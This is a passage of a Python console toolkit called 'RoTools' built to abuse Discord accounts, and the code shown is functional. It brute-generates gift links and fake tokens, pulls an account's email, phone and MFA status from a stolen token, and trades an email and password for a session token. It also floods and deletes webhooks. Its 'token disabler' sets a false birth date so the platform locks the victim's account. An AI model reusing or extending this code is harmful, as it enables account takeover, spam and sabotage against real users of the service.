print(F"{Fore.CYAN}║{Fore.WHITE} - Added Credits {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Menu {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Menu Page 2 {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Nitro Generator {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Token Generator {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Token Info {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Token from Email/Password {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Webhook Spammer {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Webhook Deleter {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Half token from user ID {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord change Hypesquad House {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Token Disabler {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} - Added Discord Token Unverifier {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} - Added Windows Menu {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} - Added Windows Power Menu {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} - Added Windows Log Out {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} - Added Windows Hibernate {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} - Added Windows Shutdown {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} - Added Windows Restart {Fore.CYAN}║")
print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
input(f"\n{Fore.CYAN}[INFO] {Fore.WHITE}Press [Enter] to return to Main Menu")
MainMenu()
#Discord Menu
def DiscordMenu():
os.system('title RoTools 0.1 - Discord Menu')
os.system('cls')
print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
print(f"{Fore.CYAN}║{Fore.WHITE} Discord Menu {Fore.CYAN}║")
print(f"{Fore.CYAN}║ ║")#-------------------|
print(f"{Fore.CYAN}║{Fore.WHITE} 1 | Discord Nitro Generator {Fore.CYAN}║")
print(f"{Fore.CYAN}║{Fore.WHITE} 2 | Discord Token Generator {Fore.CYAN}║")
print(f"{Fore.CYAN}║{Fore.WHITE} 3 | Discord Token Info {Fore.CYAN}║")
print(f"{Fore.CYAN}║{Fore.WHITE} 4 | Discord Token from Email/Password {Fore.CYAN}║")
print(f"{Fore.CYAN}║{Fore.WHITE} 5 | Discord Webhook Spammer {Fore.CYAN}║")
print(f"{Fore.CYAN}║{Fore.WHITE} 6 | Discord Webhook Deleter {Fore.CYAN}║")
print(f"{Fore.CYAN}║{Fore.WHITE} 7 | Discord Half token from user ID {Fore.CYAN}║")
print(f"{Fore.CYAN}║{Fore.WHITE} 8 | Discord change Hypesquad House {Fore.CYAN}║")
print(f"{Fore.CYAN}║{Fore.WHITE} 9 | Next page {Fore.CYAN}║")
print(f"{Fore.CYAN}║{Fore.WHITE} 0 | Main Menu {Fore.CYAN}║")
print(f"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
DiscordMenuChoice = int(input(f"\n{Fore.CYAN}[INPUT] {Fore.WHITE}Option: "))
if DiscordMenuChoice == 1:
NitroGenerator()
elif DiscordMenuChoice == 2:
TokenGenerator()
elif DiscordMenuChoice == 3:
TokenInfo()
elif DiscordMenuChoice == 4:
TokenFromEmailPass()
elif DiscordMenuChoice == 5:
WebhookSpammer()
elif DiscordMenuChoice == 6:
WebhookDeleter()
elif DiscordMenuChoice == 7:
HalfToken()
elif DiscordMenuChoice == 8:
ChangeHypesquadHouse()
elif DiscordMenuChoice == 9:
DiscordMenu2()
elif DiscordMenuChoice == 0:
MainMenu()
else:
print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Incorrect option")
input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
DiscordMenu()
#Discord Menu2
def DiscordMenu2():
os.system('title RoTools 0.1 - Discord Menu 2')
os.system('cls')
print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
print(f"{Fore.CYAN}║{Fore.WHITE} Discord Menu 2 {Fore.CYAN}║")
print(f"{Fore.CYAN}║ ║")#-------------------|
print(f"{Fore.CYAN}║{Fore.WHITE} 1 | Discord Token Disabler {Fore.CYAN}║")
print(f"{Fore.CYAN}║{Fore.WHITE} 2 | Discord Token Unverifier {Fore.CYAN}║")
print(f"{Fore.CYAN}║{Fore.WHITE} 8 | Previous page {Fore.CYAN}║")
print(f"{Fore.CYAN}║{Fore.WHITE} 9 | Next page (Not working) {Fore.CYAN}║")
print(f"{Fore.CYAN}║{Fore.WHITE} 0 | Main Menu {Fore.CYAN}║")
print(f"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
DiscordMenuChoice = int(input(f"\n{Fore.CYAN}[INPUT] {Fore.WHITE}Option: "))
if DiscordMenuChoice == 1:
DisableToken()
elif DiscordMenuChoice == 2:
TokenUnverifier()
elif DiscordMenuChoice == 8:
DiscordMenu()
elif DiscordMenuChoice == 9:
DiscordMenu2()
elif DiscordMenuChoice == 0:
MainMenu()
else:
print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Incorrect option")
input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
DiscordMenu()
#Discord Menu > Nitro Generator
def NitroGenerator():
os.system('title RoTools 0.1 - Discord Nitro Generator')
os.system('cls')
print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE} Discord Nitro Generator {Fore.CYAN}║")
print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
try:
NitroGeneratorAmount = int(input(f'\n{Fore.CYAN}[INPUT] {Fore.WHITE}Amount: '))
print()
value = 1
while value <= NitroGeneratorAmount:
code = "https://discord.gift/" + ('').join(random.choices(string.ascii_letters + string.digits, k=16))
print(f'{code}')
value += 1
print(f"\n{Fore.CYAN}[INFO] {Fore.WHITE}Generated {NitroGeneratorAmount} codes")
input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu")
DiscordMenu()
except ValueError:
print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Invalid amount")
input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu")
DiscordMenu()
#Discord Menu > Token Generator
def TokenGenerator():
os.system('title RoTools 0.1 - Discord Token Generator')
os.system('cls')
print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE} Discord Token Generator {Fore.CYAN}║")
print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
try:
TokenGeneratorAmount = int(input(f'\n{Fore.CYAN}[INPUT] {Fore.WHITE}Amount: '))
print()
value = 1
while value <= TokenGeneratorAmount:
code = "Nz" + ('').join(random.choices(string.ascii_letters + string.digits, k=59))
print(f'{code}')
value += 1
print(f"\n{Fore.CYAN}[INFO] {Fore.WHITE}Generated {TokenGeneratorAmount} tokens")
input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
DiscordMenu()
except ValueError:
print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Invalid amount")
input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
DiscordMenu()
#Discord Menu > Token Info
def TokenInfo():
os.system('title RoTools 0.1 - Discord Token Info')
os.system('cls')
print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE} Discord Token Info {Fore.CYAN}║")
print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
TokenInfoToken = input(f'\n{Fore.CYAN}[INPUT] {Fore.WHITE}Token: ')
headers = {'Authorization': TokenInfoToken, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
userName = r.json()['username'] + '#' + r.json()['discriminator']
userID = r.json()['id']
phone = r.json()['phone']
email = r.json()['email']
mfa = r.json()['mfa_enabled']
verified = r.json()['verified']
print(f"\n{Fore.CYAN}[INFO] {Fore.WHITE}User: {userName}")
print(f"{Fore.CYAN}[INFO] {Fore.WHITE}ID: {userID}")
print(f"{Fore.CYAN}[INFO] {Fore.WHITE}Phone: {phone}")
print(f"{Fore.CYAN}[INFO] {Fore.WHITE}Email: {email}")
print(f"{Fore.CYAN}[INFO] {Fore.WHITE}MFA: {mfa}")
print(f"{Fore.CYAN}[INFO] {Fore.WHITE}Verified: {verified}")
print(f"{Fore.CYAN}[INFO] {Fore.WHITE}Token: {TokenInfoToken}")
print(f"\n{Fore.CYAN}[INFO] {Fore.WHITE}Info generated")
input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
DiscordMenu()
else:
print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Invalid Token")
input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
DiscordMenu()
#Discord Menu > Token from Email/Password
def TokenFromEmailPass():
os.system('title RoTools 0.1 - Discord Token from Email/Password')
os.system('cls')
print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE} Discord Token from Email/Password {Fore.CYAN}║")
print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
TokenFromEmail = input(f'\n{Fore.CYAN}[INPUT] {Fore.WHITE}Email: ')
TokenFromPassword = input(f'\n{Fore.CYAN}[INPUT] {Fore.WHITE}Password: ')
data={'email': TokenFromEmail, 'password': TokenFromPassword, 'undelete': "false"}
headers={'content-type': "application/json", 'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36"}
r = requests.post('https://discord.com/api/v8/auth/login', json=data, headers=headers)
if r.status_code == 200:
token = r.json()['token']
print(f'\n{Fore.WHITE}TOKEN: {token}')
print(f"\n{Fore.CYAN}[INFO] {Fore.WHITE}Token generated")
input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
DiscordMenu()
os.system('cls; clear')
elif "PASSWORD_DOES_NOT_MATCH" in r.text:
print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Invalid password")
input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
DiscordMenu()
elif "captcha-required" in r.text:
print(f"\n{Fore.YELLOW}[WARN] {Fore.WHITE}Returned captcha")
input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
DiscordMenu()
else:
print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Invalid email or password")
input(f'\n{Fore.WHITE}Press [Enter] to return to Discord Menu')
DiscordMenu()
#Discord Menu > WebHook Spammer
def WebhookSpammer():
os.system('title RoTools 0.1 - Discord Webhook Spammer')
os.system('cls')
print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE} Discord Webhook Spammer {Fore.CYAN}║")
print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
try:
WebhookSpammerWebhook = input(f"\n{Fore.CYAN}[INPUT] {Fore.WHITE}Webhook: ")
WebhookSpammerMessage = input(f"{Fore.CYAN}[INPUT] {Fore.WHITE}Message: ")
WebhookSpammerAmount = int(input(f"{Fore.CYAN}[INPUT] {Fore.WHITE}Amount: "))
print()
for i in range(WebhookSpammerAmount):
_data = requests.post(WebhookSpammerWebhook, json={'content': WebhookSpammerMessage}, headers={'Content-Type': 'application/json'})
if _data.status_code < 400:
print(f'{Fore.GREEN}[SUCCESS] {Fore.WHITE}Sent a message')
print(f'\n{Fore.CYAN}[INFO] {Fore.WHITE}Sent {WebhookSpammerAmount} messages')
input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu")
DiscordMenu()
except:
print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Couldn't spam Webhook")
input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu")
DiscordMenu()
#Discord Menu > Webhook Deleter
def WebhookDeleter():
os.system('title RoTools 0.1 - Discord Webhook Deleter')
os.system('cls')
print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE} Discord Webhook Deleter {Fore.CYAN}║")
print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
try:
WebhookDeleterWebhook = input(f"\n{Fore.CYAN}[INPUT] {Fore.WHITE}Webhook: ")
requests.delete(WebhookDeleterWebhook.rstrip())
print(f'\n{Fore.CYAN}[INFO] {Fore.WHITE}Webhook deleted')
input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu")
DiscordMenu()
except:
print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Couldn't delete Webhook")
input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu")
DiscordMenu()
#Discord Menu > HalfToken
def HalfToken():
os.system('title RoTools 0.1 - Discord Half Token from user ID')
os.system('cls')
print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE} Discord Half token from user ID {Fore.CYAN}║")
print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
userid = input(f'\n{Fore.CYAN}[INPUT] {Fore.WHITE}UserID: ')
string_b = f"{userid}".encode('utf')
bas64_bytes = base64.b64encode(string_b)
HalfTokenGen = bas64_bytes.decode('utf-8')
print(f'\n{Fore.WHITE}Half Token: {HalfTokenGen}')
print(f'\n{Fore.CYAN}[INFO] {Fore.WHITE}Half token generated')
input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu")
DiscordMenu()
#Discord Menu > Change Hypesquad House
def ChangeHypesquadHouse():
os.system('title RoTools 0.1 - Discord change Hypesquad House')
os.system('cls')
print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE} Discord change Hypesquad House {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} 1 | Bravery {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} 2 | Brilliance {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} 3 | Balance {Fore.CYAN}║")
print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
try:
ChangeHypesquadHouseHouse = int(input(f"\n{Fore.CYAN}[INPUT] {Fore.WHITE}Option: "))
ChangeHypesquadHouseToken = input(f'{Fore.CYAN}[INPUT] {Fore.WHITE}Token: ')
headers = {'Authorization': ChangeHypesquadHouseToken, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
headers = {
'Authorization': ChangeHypesquadHouseToken,
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/0.0.305 Chrome/69.0.3497.128 Electron/4.0.8 Safari/537.36'
}
if ChangeHypesquadHouseHouse == "1":
payload = {'house_id': 1}
elif ChangeHypesquadHouseHouse == "2":
payload = {'house_id': 2}
elif ChangeHypesquadHouseHouse == "3":
payload = {'house_id': 3}
r = requests.post('https://discordapp.com/api/v6/hypesquad/online', headers=headers, json=payload, timeout=10)
if r.status_code == 204:
print(f'\n{Fore.CYAN}[INFO] {Fore.WHITE}House changed')
input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu")
DiscordMenu()
except:
print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Invalid token")
input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu")
DiscordMenu()
#Discord Menu 2 > Disable Token
def DisableToken():
os.system('title RoTools 0.1 - Discord Token Disabler')
os.system('cls')
print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE} Discord Token Disabler {Fore.CYAN}║")
print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
disabletokentoken = input(f'\n{Fore.CYAN}[INPUT] {Fore.WHITE}Token: ')
headers = {'Authorization': disabletokentoken, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
r = requests.patch('https://discordapp.com/api/v8/users/@me', headers={'Authorization': disabletokentoken}, json={'date_of_birth': '2015-7-16'})
if r.status_code == 400:
print(f'\n{Fore.CYAN}[INFO] {Fore.WHITE}Token disabled')
input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu 2")
DiscordMenu2()
else:
print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Invalid token")
input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu 2")
DiscordMenu2()
else:
print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Invalid token")
input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu 2")
DiscordMenu2()
#Discord Menu 2 > Token Unverifier
def TokenUnverifier():
os.system('title RoTools 0.1 - Discord Token Unverifier')
os.system('cls')
print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
